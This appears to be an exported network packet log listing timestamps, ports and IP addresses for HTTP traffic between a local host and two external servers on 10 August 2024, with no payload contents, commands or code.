Aug 10, 2024 16:12:22.778697968 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778702974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778712988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778722048 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778729916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778740883 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778759956 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778774023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778788090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778800964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778800964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778804064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778817892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778831959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778836966 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778836966 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778846979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778861046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778876066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778886080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778886080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778889894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778903961 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.778903961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.778944016 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.779002905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.779740095 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.779752016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.779761076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.779772997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.779783964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.779797077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.779812098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.779825926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.779825926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.779869080 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.779894114 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.779915094 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.780731916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.780869961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.780885935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.780899048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.780898094 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.780913115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.780915022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.780926943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.780940056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.780946016 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.780946016 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.780953884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.780987978 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.781075954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.781681061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.781771898 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.781812906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.781826019 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.782006979 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.782196999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.782208920 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.782219887 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.782232046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.782243967 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.782248020 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.782258987 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.782273054 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.782284975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.782298088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.782310963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.782320023 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.782320023 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.782363892 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.783230066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783242941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783252954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783263922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783277035 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783293009 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783296108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.783297062 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.783307076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783335924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.783335924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.783376932 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.783749104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783761978 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783771038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783792019 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.783901930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783914089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783920050 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.783924103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783936977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783951044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783962011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.783970118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.783970118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.784014940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.784014940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.784720898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.784733057 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.784744024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.784758091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.784768105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.784796953 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.784796953 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.784847021 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.793585062 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.793611050 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.793622971 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.793663979 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.793682098 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.793764114 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.793776035 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.793803930 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.793817043 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.793931961 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.793943882 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.793973923 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.793987989 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.795311928 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.795361042 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.795494080 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.795505047 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.795533895 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.795727968 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.795738935 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.795747995 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.795759916 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.795772076 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.795788050 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.796267986 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.796283007 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.796295881 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.796309948 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.796324015 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.796328068 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.796335936 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.796350956 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.796365976 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.796366930 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.796379089 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.796401978 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.796402931 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.796442032 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.797276020 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.797287941 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.797297955 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.797308922 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.797318935 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.797326088 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.797331095 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.797352076 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.797364950 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.798079014 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.798094988 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.798105955 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.798115969 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.798125982 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.798129082 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.798139095 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.798146009 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.798151970 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.798166990 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.798188925 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.804059982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.810720921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.829543114 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.829600096 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.829663992 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.829679012 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.829705000 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.829720020 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.829876900 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.829890966 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.829911947 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.829930067 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.830060005 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.830073118 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.830111027 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.830394983 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.830406904 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.830418110 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.830430031 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.830440044 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.830444098 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.830457926 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.830482960 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.831037045 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.831048012 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.831058025 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.831069946 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.831082106 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.831084967 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.831098080 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.831120014 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.831197977 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.831214905 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.831239939 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.831264019 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.831836939 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.831849098 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.831861019 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.831880093 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.831906080 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.831999063 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.832012892 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.832025051 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.832037926 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.832055092 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.832082033 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.832729101 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.832741976 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.832752943 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.832782984 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.832797050 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.832892895 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.832911015 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.832931042 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.832951069 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.833050013 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.833064079 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.833097935 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.833566904 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.833615065 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.833723068 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.833734989 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.833745003 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.833755970 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.833765984 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.833766937 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.833779097 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.833796978 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.833828926 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.834645987 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.834659100 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.834667921 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.834678888 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.834690094 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.834697962 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.834702015 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.834711075 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.834714890 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.834722996 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.834728003 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.834749937 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.834775925 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.835464001 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.835477114 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.835520983 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.835633039 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.835647106 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.835656881 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.835668087 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.835678101 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.835679054 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.835691929 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.835691929 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.835720062 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.835743904 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.836255074 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.836306095 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.836374044 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.836385965 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.836395979 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.836405993 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.836416960 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.836417913 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.836429119 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.836430073 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.836440086 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.836451054 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.836457014 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.836462975 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.836469889 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.836474895 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.836496115 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.836520910 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.838479042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.838527918 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.838594913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.838607073 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.838641882 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.838762045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.838805914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.839051008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.839061022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.839071035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.839082003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.839093924 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.839112997 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.846708059 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.846718073 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.846728086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.846792936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.846798897 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.846877098 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.846924067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.846934080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.846976995 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.847173929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.847192049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.847203970 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.847213030 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.847222090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.847234964 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.847264051 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.847698927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.847709894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.847718954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.847729921 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.847743034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.847763062 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.847768068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.847778082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.847788095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.847803116 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.847820997 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.848577023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.848587990 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.848596096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.848608017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.848618031 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.848623991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.848634958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.848640919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.848650932 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.848659039 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.848668098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.848675013 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.848691940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.848704100 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.849478960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.849492073 CEST	80	49739	147.45.44.104	192.168.2.4
